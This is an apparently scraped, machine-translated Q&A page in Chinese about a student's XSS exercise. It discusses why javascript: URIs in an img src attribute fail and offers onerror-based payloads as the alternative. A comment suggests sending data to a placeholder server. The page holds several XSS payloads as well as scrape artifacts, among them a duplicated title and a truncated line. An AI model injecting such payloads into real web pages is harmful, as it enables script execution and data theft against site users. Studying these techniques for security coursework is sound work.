图像的src属性内的Javascript范围_Javascript_Security_Xss

图像的src属性内的Javascript范围

javascript security

图像的src属性内的Javascript范围,javascript,security,xss,Javascript,Security,Xss,我必须为一个与安全相关的大学项目进行XSS攻击。我想存储一个在其源属性中包含恶意代码的图像。然而，我似乎没有从src属性访问任何javascript对象的权限以下是我尝试过的一些事情： <img src="j&#X41vascript:alert('XSS')"> 抛出：未定义引用错误警报 <img src="j&#X41vascript:window.alert('XSS')"> 抛出：未定义引用错误窗口 <img src="j&am

我必须为一个与安全相关的大学项目进行XSS攻击。我想存储一个在其源属性中包含恶意代码的图像。然而，我似乎没有从src属性访问任何javascript对象的权限

以下是我尝试过的一些事情：

<img src="j&#X41vascript:alert('XSS')">

抛出：未定义引用错误警报

<img src="j&#X41vascript:window.alert('XSS')">

抛出：未定义引用错误窗口

<img src="j&#X41vascript:var x = new XMLHttpRequest();">

抛出：未定义引用错误XMLHttpRequest

<img src="j&#X41vascript:var x = new XMLHttpRequest();">

这里的问题是什么？我如何访问站点的主窗口和我想要访问的对象

编辑：

OneError和所有其他事件都将被过滤。

未执行

src

，因此无法工作

解决方法是使用

onerror

：

<img src="wrong" onerror="alert('XSS')">

但是没有一个像样的框架容易受到这种攻击。

这一评论并没有真正的帮助。为什么不执行？错误意味着它已被执行。您是否可以执行类似于

javascript:'http//yourserver.example？js='+Object

（看看到达服务器的是什么）？并非所有浏览器都容易受到此攻击。你的目标/测试浏览器是什么-我在Firefox上测试。没有办法通过img的src属性执行Javascript代码。（我假设引号是经过编码的）。你也读过这个吗？实际上，

javascript

pseudo协议表示以下任何内容都被解释为javascript。@Gumbo在src属性上使用一个不太旧的浏览器？我不这么认为。